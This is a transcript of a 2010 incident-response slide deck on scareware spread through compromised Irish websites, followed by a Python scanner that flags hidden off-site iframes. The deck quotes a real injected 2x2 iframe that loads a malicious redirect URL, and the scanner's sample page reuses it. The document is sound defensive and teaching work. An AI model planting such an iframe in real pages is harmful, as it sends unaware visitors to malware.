Scareware Traversing the World via Ireland

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Published in: Technology, News & Politics

  1. Scareware Traversing the World via an Irish Web Exploit. Mark Hillick (@markofu), IrissCert Incident Handler. Friday 17 September 2010
  2. Presentations: 99%
  3. Ireland
  4. Ireland: CSIRT/CERT?
  5. Europe
  6. Introducing IRISS • Volunteer handlers • Local security professionals • Weekly handler shifts • Not-for-profit organization
  7. What do we see?
  8. How do users feel? • 2/3 have been victims • < 10% feel very safe • 97% expect to be victims • Law enforcement & businesses lack resources
  9. Why we're here!
  10. ALERTS: IRISS custom
  11. Scareware
  12. $$$$: FBI -> $150 million
  13. How easy? Very :-(
  14. Growth
  15. Scareware Evolving
  16. Remember Zen and the art of incident handling ...
  17. Reactions
  18. Reactions
  19. Reactions
  20. Identification • Gather information • Analysis • Determine
  21. Identification - Vector: Legitimate websites
  22. Identification - WA: Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body>
  23. Identification - iframe
  24. Identification - WA • DNS requests • HTTP (GETs, POSTs) • Scripts
  25. Identification - SW
  26. Identification - SW
  27. Identification - SW
  28. Identification - SW
  29. Identification - Analysis • Exploited sites hosted on one server • Weak FTP passwords (e.g. Ghost61) • Two most popular website attacks: Gumblar (PHP sites) and Asprox (SQL injection)
  30. Containment • Verify • Stop the spread (Remove, Notify, Inform) • Blackhole. Image source: Profound Whatever - Flickr Creative Commons
  31. Eradication • Remove • Improve • Vulnerability analysis • Restore
  32. Eradication - How?
  33. Eradication - Hosting: Struggle but...
  34. Recovery. Image source: Dilbert ©2009, United Feature Syndicate, Inc.
  35. Recovery - Be Sure! Validate, Restore & Monitor
  36. Lessons Learned
  37. Lessons Learned: Things required for an IR plan • IR team • Contact list • Regular reviews • Escalation process
  38. Lessons Learned • Awareness • Back up & test the restore ;-) • Patch • Test website for vulnerabilities & exploits • Defence-in-depth • Free local & online tools for safer browsing & analysis
  39. Lessons Learned: "A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website" - Jeremiah Grossman (Feb. 2010)
  40. Lessons Learned - Prep: Fail to prepare, well you know the rest :)
  41. Scareware Evolution. Source: http://www.f-secure.com
  42. What do you use?
  43. Go raibh míle maith agat (thank you very much). Twitter: @markofu @irisscert @hackeire #irisscon. Google-Fu: "scareware site:sans.org". Unless stated, source of images -> Flickr Creative Commons, iStockPhoto or my own!!
  44. Well......
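The 2x2 hidden iframe quoted on slide 22 is the kind of injection a site owner can check saved pages for during identification and again after restore. The following is an added example, not code from the presentation or from IRISS: a standard-library Python scanner that flags iframes sized or styled to be invisible whose src points away from the site's own host; the host www.example.ie and the surrounding sample page are constructed, while the injected iframe is the one shown on the slide.

```python
"""Added example (not the presenter's tooling): flag hidden, off-site <iframe>
injections like the one on slide 22, using only the Python standard library."""
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_HIDDEN_PX = 10  # a frame this small is not meant for the visitor to see


class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):  # also called for self-closing <iframe .../>
        if tag == "iframe":  # attribute names arrive lower-cased; values may be None
            self.iframes.append({k: (v or "") for k, v in attrs})


def _px(value):
    """Parse a width/height attribute such as '2' or '2px'; None if not numeric."""
    digits = value.strip().lower().removesuffix("px")
    return int(digits) if digits.isdigit() else None


def is_hidden(attrs):
    """True when the frame is sized or styled so that a visitor will not notice it."""
    w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
    tiny = w is not None and h is not None and w <= MAX_HIDDEN_PX and h <= MAX_HIDDEN_PX
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, site_host):
    """Return the src of each hidden iframe whose host is not site_host."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src = same host
        if is_hidden(attrs) and host.lower() != site_host.lower():
            hits.append(src)
    return hits


# Constructed sample: a normal page whose closing </body> has been prefixed with
# the 2x2 iframe quoted on slide 22, next to a benign, visible video embed.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe width="560" height="315" src="https://www.youtube.com/embed/x"></iframe>
<iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body></html>"""

if __name__ == "__main__":
    print(find_suspicious_iframes(SAMPLE_PAGE, "www.example.ie"))
```

Run against an archive of a site's pages and compare results before and after restoring from backup, which is the "Validate, Restore & Monitor" step on slide 35.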
